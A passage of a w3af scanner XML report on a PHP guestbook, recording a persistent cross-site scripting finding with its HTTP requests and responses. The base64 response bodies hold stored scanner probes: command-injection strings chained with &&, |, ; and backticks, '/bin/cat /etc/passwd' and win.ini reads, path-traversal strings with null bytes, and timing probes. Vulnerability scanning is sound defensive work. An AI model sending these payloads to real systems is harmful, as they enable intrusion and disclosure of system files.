KTs8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAg
PHA+NTY8L3A+CiAgICAgICAgPHA+VGhyZWFkLnNsZWVwKDMwMDApOzwvcD4KICAgICAgICA8aHIg
Lz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8
aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAg
ICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAg
ICAgICA8aHIgLz4KICAgICAgICA8cD4mJnBpbmcgLW4gNCBsb2NhbGhvc3Q8L3A+CiAgICAgICAg
PHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAg
ICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAg
ICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+
CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8
L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+
NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAg
PHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAg
ICAgPHA+VGhyZWFkLlNsZWVwKDMwMDApOzwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4K
ICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5UaHJlYWQuU2xlZXAo
MzAwMCk7PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhl
bGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPiYmcGluZyAtYyA0IGxvY2Fs
aG9zdDwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAg
ICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAg
ICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4K
ICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIg
Lz4KICAgICAgICA8cD4mJi91c3Ivc2Jpbi9waW5nIC1zIGxvY2FsPC9wPgogICAgICAgIDxwPkhl
bGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAg
IDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAg
ICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPnxwaW5nIC1u
IDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAv
PgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAg
IDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAg
ICAgIDxociAvPgogICAgICAgIDxwPnxwaW5nIC1jIDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAg
IDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAg
ICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgog
ICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPnwvdXNy
L3NiaW4vcGluZyAtcyBsb2NhbGg8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+
CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8
L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+O3BpbmcgLW4gNCBsb2NhbGhvc3Q8L3A+CiAg
ICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+
CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8
L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+
NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAg
PHA+O3BpbmcgLWMgNCBsb2NhbGhvc3Q8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+
CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8
L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29y
bGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+Oy91c3Ivc2Jpbi9waW5nIC1zIGxvY2Fs
aDwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8
cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAg
ICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAg
ICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4K
ICAgICAgICA8cD5gcGluZyAtbiA0IGxvY2FsaG9zdGA8L3A+CiAgICAgICAgPHA+SGVsbG8gV29y
bGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8g
V29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVs
bG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+
SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+YHBpbmcgLWMgNCBsb2Nh
bGhvc3RgPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAg
ICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgog
ICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAv
PgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPnJ1biBwaW5nIC1uIDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxwPkhl
bGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAg
IDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAg
ICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgog
ICAgICAgIDxwPnBpbmcgLW4gNCBsb2NhbGhvc3Q8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAg
PHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAg
ICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAg
ICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+
CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+cGluZyAtYyA0IGxvY2FsaG9zdDwvcD4KICAg
ICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4K
ICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwv
cD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3Js
ZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD4vdXNyL3Ni
aW4vcGluZyAtcyBsb2NhbGhvc3QgNDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41Njwv
cD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41
NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8
cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAg
ICA8cD41NjwvcD4KICAgICAgICA8cD4mJnBpbmcgLW4gNCBsb2NhbGhvc3Q8L3A+CiAgICAgICAg
PGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+
CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+JiZwaW5nIC1jIDQg
bG9jYWxob3N0PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAg
IDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAg
ICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgog
ICAgICAgIDxwPiYmL3Vzci9zYmluL3BpbmcgLXMgbG9jYWxob3N0IDQ8L3A+CiAgICAgICAgPGhy
IC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAg
PGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+fHBpbmcgLW4gNCBsb2Nh
bGhvc3Q8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVs
bG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+
SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAg
PHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAg
ICAgPHA+fHBpbmcgLWMgNCBsb2NhbGhvc3Q8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+
NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAg
PHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAg
ICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAg
ICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+fC91c3Ivc2Jpbi9waW5nIC1zIGxvY2FsaG9zdCA0
PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdv
cmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxv
IFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhl
bGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxw
PjtwaW5nIC1uIDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9w
PgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2
PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxw
PjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAg
IDxwPjU2PC9wPgogICAgICAgIDxwPjtwaW5nIC1jIDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAg
IDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAg
ICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgog
ICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPjsvdXNyL3NiaW4vcGlu
ZyAtcyBsb2NhbGhvc3QgNDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAg
ICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4K
ICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41Njwv
cD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41
NjwvcD4KICAgICAgICA8cD5gcGluZyAtbiA0IGxvY2FsaG9zdGA8L3A+CiAgICAgICAgPGhyIC8+
CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhy
IC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAg
PGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+YHBpbmcgLWMgNCBsb2NhbGhv
c3RgPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxv
IFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhl
bGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAg
IDxwPnJ1biBwaW5nIC1uIDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxw
PjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgo=
</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </information>
    <information id="[837, 1175]" name="Persistent Cross-Site Scripting vulnerability" plugin="xss" url="http://192.168.0.116:31337/post">
        <description>A persistent Cross Site Scripting vulnerability was found by sending &quot;ru2ft&lt;/-&gt;&quot; to the &quot;message&quot; parameter at http://192.168.0.116:31337/post, which is echoed when browsing to http://192.168.0.116:31337/. This vulnerability was found in the requests with ids 837 and 1175.</description>
        <http-transactions>
            <http-transaction id="837">
                <httprequest>
                    <status>POST http://192.168.0.116:31337/post HTTP/1.1</status>
                    <headers>
                        <header content="33" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1ydTJmdCUzQyUyRi0lM0UmcHNldWRvPTU2
</body>
                </httprequest>
                <httpresponse id="837">
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">Message added successfullygo back to &lt;a href='/'&gt;messages&lt;/a&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="1175">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="1175">
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="base64">ICAgIDxwPjxhIGhyZWY9Jy9wb3N0Jz5sZWF2ZSBhIG1lc3NhZ2UhPC9hPjwvcD4KICAgIDxociAv
PgogICAgICAgIDxwPm1hbm55PC9wPgogICAgICAgIDxwPmJlYXV0aWZ1bCB3ZWJzaXRlITwvcD4K
ICAgICAgICA8aHIgLz4KICAgICAgICA8cD5tYW5ueTwvcD4KICAgICAgICA8cD5pJ3ZlIGdvdCBu
b3RoaW5nIGVsc2UgdG8gZG88L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+PC9wPgogICAg
ICAgIDxwPjwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5I
ZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8
cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD5SZXNwb25zZS5Xcml0
ZShuZXcgU3RyaW5nPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAv
PgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPlJlc3BvbnNlLldyaXRlKG5ldyBTdHJpbmco
InJrZHhqIiw1KSk8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+L2Jpbi9jYXQgL2V0Yy9w
YXNzd2Q8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAg
ICAgPHA+NTY8L3A+CiAgICAgICAgPHA+L2Jpbi9jYXQgL2V0Yy9wYXNzd2Q8L3A+CiAgICAgICAg
PGhyIC8+CiAgICAgICAgPHA+dHlwZSAlU1lTVEVNUk9PVCV3aW4uaW5pPC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAg
IDxwPnR5cGUgJVNZU1RFTVJPT1Qld2luLmluaTwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8
cD4mJi9iaW4vY2F0IC9ldGMvcGFzc3dkPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgog
ICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPiYmL2Jpbi9jYXQgL2V0
Yy9wYXNzd2Q8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+JiZ0eXBlICVTWVNURU1ST09U
JXdpbi5pbjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAg
ICAgICA8cD41NjwvcD4KICAgICAgICA8cD4mJnR5cGUgJVNZU1RFTVJPT1Qld2luLmluaTwvcD4K
ICAgICAgICA8aHIgLz4KICAgICAgICA8cD58L2Jpbi9jYXQgL2V0Yy9wYXNzd2Q8L3A+CiAgICAg
ICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAg
ICAgICAgPHA+fC9iaW4vY2F0IC9ldGMvcGFzc3dkPC9wPgogICAgICAgIDxociAvPgogICAgICAg
IDxwPnx0eXBlICVTWVNURU1ST09UJXdpbi5pbmk8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8
L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+fHR5cGUgJVNZ
U1RFTVJPT1Qld2luLmluaTwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD47L2Jpbi9jYXQg
L2V0Yy9wYXNzd2Q8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+
CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+Oy9iaW4vY2F0IC9ldGMvcGFzc3dkPC9wPgog
ICAgICAgIDxociAvPgogICAgICAgIDxwPjt0eXBlICVTWVNURU1ST09UJXdpbi5pbmk8L3A+CiAg
ICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+
CiAgICAgICAgPHA+O3R5cGUgJVNZU1RFTVJPT1Qld2luLmluaTwvcD4KICAgICAgICA8aHIgLz4K
ICAgICAgICA8cD5gL2Jpbi9jYXQgL2V0Yy9wYXNzd2RgPC9wPgogICAgICAgIDxwPkhlbGxvIFdv
cmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPmAvYmlu
L2NhdCAvZXRjL3Bhc3N3ZGA8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+cnVuIHR5cGUg
JVNZU1RFTVJPT1Qld2luLjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8
aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5ydW4gdHlwZSAlU1lTVEVNUk9PVCV3
aW4uaW5pPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjg1MTE4MjM1PC9wPgogICAgICAg
IDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPnBvc3Q8L3A+CiAg
ICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+
CiAgICAgICAgPHA+cG9zdDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD4uLi8uLi8uLi8u
Li8uLi8uLi8uLi8uLi8uPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPi4uLy4uLy4uLy4uLy4uLy4uLy4uLy4u
Ly4uLy4uLy4uLy4uLy4uLy4uLy4uL2V0Yy9wYXNzd2Q8L3A+CiAgICAgICAgPGhyIC8+CiAgICAg
ICAgPHA+Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3Js
ZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD4uLi8uLi8u
Li8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dkADwvcD4KICAg
ICAgICA8aHIgLz4KICAgICAgICA8cD4uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uPC9wPgogICAg
ICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgog
ICAgICAgIDxwPi4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uL2V0
Yy9wYXNzd2QALmh0bWw8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+L2V0Yy9wYXNzd2Q8
L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+
NTY8L3A+CiAgICAgICAgPHA+L2V0Yy9wYXNzd2Q8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAg
PHA+L2V0Yy9wYXNzd2QAPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPi9ldGMvcGFzc3dkADwvcD4KICAgICAg
ICA8aHIgLz4KICAgICAgICA8cD4vZXRjL3Bhc3N3ZAAuaHRtbDwvcD4KICAgICAgICA8cD5IZWxs
byBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD4v
ZXRjL3Bhc3N3ZAAuaHRtbDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD4uLi8uLi8uLi8u
Li8uLi8uLi8uLi8uLi8uPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPi4uLy4uLy4uLy4uLy4uLy4uLy4uLy4u
Ly4uLy4uLy4uLy4uLy4uLy4uLy4uL2Jvb3QuaW5pADwvcD4KICAgICAgICA8aHIgLz4KICAgICAg
ICA8cD4uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxk
PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPi4uLy4uLy4u
Ly4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uL2Jvb3QuaW5pAC5odG1sPC9wPgog
ICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9w
PgogICAgICAgIDxociAvPgogICAgICAgIDxwPkM6CG9vdC5pbmk8L3A+CiAgICAgICAgPHA+SGVs
bG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+
QzoIb290LmluaTwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD5DOghvb3QuaW5pADwvcD4K
